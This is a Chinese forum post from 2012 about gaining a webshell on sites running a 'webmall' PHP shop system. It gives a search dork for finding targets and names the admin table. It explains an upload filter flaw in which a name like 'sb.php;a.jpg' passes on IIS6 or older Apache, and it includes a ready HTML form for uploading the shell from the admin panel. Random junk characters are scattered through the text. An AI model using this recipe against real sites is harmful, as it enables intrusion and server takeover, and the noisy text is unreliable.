关键字:inurl:webmall/detail.php?id6 Y ] _ E' R9 E
1 S! a7 R% x* j
数据表:pwn_base_admin
$ k! }3 N; E, N6 K1 x4 J 7 x1 P6 b& m% q* L' P
关于拿shell
+ ?- W9 _7 A% g; w9 _ * ]: ~1 p6 {( p$ d
首先登录后台admin.php& o7 k( E' D5 P9 w: ]$ _
3 t$ d- v6 c7 m1 l6 v9 j看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
3 g% C3 X. I, H% L+ c换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg6 Z5 U! |# n$ l( i
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
# S3 _4 L( X( M( j<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
' w' \5 n+ [9 j+ z: F& `) U<input type="text" name="fileName" value="sb.php;a.jpg" /> ( l! L& [1 C2 |
<input type="hidden" name="attachPath" value="news/pics/" /> , Z9 b( W0 b/ m9 ~) X7 P8 ?% y
<input type="file" name="fileData" size="14" /></td>
/ G; b/ o H5 y2 d3 D4 \<input type="submit" name="button" value="确定" /> 3 b. P- _, ]2 ^" E h
</form>, m" B q0 V9 L8 [
s) p4 x0 A$ T2 `
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
# \6 F- e% x$ L9 Q( x3 x3 {! ?& i8 H: R) z* B
|
发表于 2012-11-9 20:52:15
收藏
支持
反对